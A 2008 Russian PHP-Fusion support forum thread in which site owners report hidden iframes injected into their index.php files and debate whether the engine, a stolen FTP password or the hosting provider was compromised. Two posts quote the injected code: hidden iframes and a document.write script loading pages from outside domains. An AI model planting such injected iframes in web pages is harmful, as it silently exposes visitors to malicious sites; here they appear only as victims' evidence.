Регистрация    Забыли пароль?        Правила форума    FAQ (читать перед созданием новой темы)
Имя   Пароль  запомнить
  
Просмотр темы
Вернуться на сайт: PHP-Fusion SF Russian Support Site

Форум поддержки PHP-Fusion SF | PHP-Fusion SF - Разное | Вопросы / Жалобы / Предложения
# 1 Тема: Появился фрейм http://xmanages.cn/in/
saurus
Пользователь

Avatar пользователя




Местный

Сообщений: 19
Зарегистрирован: 17 Декабря 2007, 04:23:44
Сказали спасибо 0 раз
Статус: offline
Опубликовано 25 Сентября 2008, 19:12:45
Народ!

Такая проблема. Может быть уже обсуждалась, но не нашел.

Во всех файлах index.php появилась в конце неприятная строчка

"<iframe src="http://xmanages.cn/in/" width=1 height=1 style="visibility: hidden"></iframe>"

Народ жалуется, что не может зайти на сайт, или на сайте вирус. Ясно дело, что кого-то хакнули. \

Внимание, вопрос - сайт или хостера?
 
^ наверх ^
# 2  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 25 Сентября 2008, 19:45:40
возможно хакнули твой комп... стырили пароли и через фтп поменяли файлы...
нужно логи изучать, какой хостер, какая версия двига, какие сторонние плагины, сколько сайтов на одном аккаунте!


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 3  
leo
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 54
Зарегистрирован: 07 Февраля 2008, 12:34:26
Сказали спасибо 2 раз
Статус: offline
Опубликовано 25 Сентября 2008, 19:54:54
Та же проблема была.

Есть основной сайт, + рядом поставил php-fusion sf последней версии(для теста). Так он долгое время и висел. Через какое то время папки основного сайта и папка с фьюджином,
были заражены ([script language=javascript]status=location;document.write('[!--iframe src="http://online-channels.info/in.cgi?traf" width=0 height=0 frameborder=0 display:none onLoad="status=defaultStatus;"][/iframe--]) все файлы index*php*html*htm, + ещё пхп файла с другими именами.

Все почистил, через день макс снова все заражено. Снес фьюджин, почистил файлы, уже 3-4 месяца норм.
Пароли врядли кто мог украсть.

Я думаю тут где-то дырка в движке. Со временем если это так, думаю появится у многих


[Изменил(а) leo, 25 Сентября 2008, 19:57:42]  
^ наверх ^
# 4  
Psc
SF Team

Avatar пользователя

Psc

SF Support Team

Почетный SF

Сообщений: 2515
Откуда: As is
Зарегистрирован: 10 Ноября 2007, 13:15:07
Сказали спасибо 353 раз
Статус: offline
Опубликовано 25 Сентября 2008, 19:57:34
Каким образом можно изменить файл без прав на это?


--------------------
Retired
^ наверх ^
# 5  
leo
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 54
Зарегистрирован: 07 Февраля 2008, 12:34:26
Сказали спасибо 2 раз
Статус: offline
Опубликовано 25 Сентября 2008, 19:58:55
Psc написал:
Каким образом можно изменить файл без прав на это?


я не знаю, как но пароль там стоял нормальный.
 
^ наверх ^
# 6  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 25 Сентября 2008, 20:01:58
на чем базируется основной сайт, правильно ли были выставлены права доступа..


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 7  
leo
Пользователь

Avatar пользователя



Завсегдатый

Сообщений: 54
Зарегистрирован: 07 Февраля 2008, 12:34:26
Сказали спасибо 2 раз
Статус: offline
Опубликовано 25 Сентября 2008, 20:06:19
Sky написал:
на чем базируется основной сайт, правильно ли были выставлены права доступа..

основной сайт уже 5лет стоит, движок был написан одним человеком, права в норме были.

И основной двиг винить тут не надо(думаю) так как после сноса тестового движка, файлы больше не зарожались.


[Изменил(а) leo, 25 Сентября 2008, 20:07:31]  
^ наверх ^
# 8  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 25 Сентября 2008, 20:10:59
хы... вот чесно хз... возможно ктото нашел новую дыру... но пока об этом мало извесно... хотя как добовлять бэдкоды при условии что права стоят нужные..


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 9  
saurus
Пользователь

Avatar пользователя




Местный

Сообщений: 19
Зарегистрирован: 17 Декабря 2007, 04:23:44
Сказали спасибо 0 раз
Статус: offline
Опубликовано 26 Сентября 2008, 11:02:22
Sky написал:
хы... вот чесно хз... возможно ктото нашел новую дыру... но пока об этом мало извесно... хотя как добовлять бэдкоды при условии что права стоят нужные..


Sky, я уже несколько раз до этого сайт обновлял и ставил, все права ставлю, какие надо, и какие указаны в документе при инсталляции. Фрейм записался только в index.php файлы. Что очень не приятно, поскольку их много. Я все же склоняюсь, что хакнули именно хостера, а не движок. Если бы потырили пароль ftp - не стали бы думаю тупо добавлять строчку ко всем index.php. Явно, что работало автоматически, и искало оно именно определенные файлы. Посмотрел в нете - появляется такое именно когда хакают хостера, лазят по его папкам, и меняют все, что хотят. Или юзают эксплойт. Вообщем думаю надо еще хостеру написать.
 
^ наверх ^
# 10  
Sky
Супер Администратор

Avatar пользователя

АнарХия Х4

Администратор

Сообщений: 3023
Откуда: Astana
Зарегистрирован: 01 Апреля 2007, 18:11:10
Сказали спасибо 470 раз
Статус: offline
Опубликовано 26 Сентября 2008, 12:11:56
с такими проблема не только фужин сталкивается... почитайте к примеру форум славхоста... там начиная от самописного и заканчивая такими грандами как битрикс страдают от фреймов в индекс файлах


--------------------
Я в контакте

Народ читаем и запоминаем!
Не помогаю по ICQ
Не помогаю по ЛС
буду просто игнорировать эти сообщения!
Все вопросы задаем на форуме, но предварительно пользуемся поиском!
^ наверх ^
# 11  
saurus
Пользователь

Avatar пользователя




Местный

Сообщений: 19
Зарегистрирован: 17 Декабря 2007, 04:23:44
Сказали спасибо 0 раз
Статус: offline
Опубликовано 26 Сентября 2008, 13:55:38
геморно это все вообщем. К Fusion нареканий нет. Это явно не его проблема. Просто устал удалять фрейм из файлов. smiley А переписывать файлы не хотелось, поскольку изменения вносил.
 
^ наверх ^
Перейти на форум:


105,517,280 уникальных посетителей
сейчас: 23 Ноября 2024, 10:00:01
Генерация страницы: 0.39 сек.

Original size:30 кб.
GZipped size: 7 кб.
Compression:78%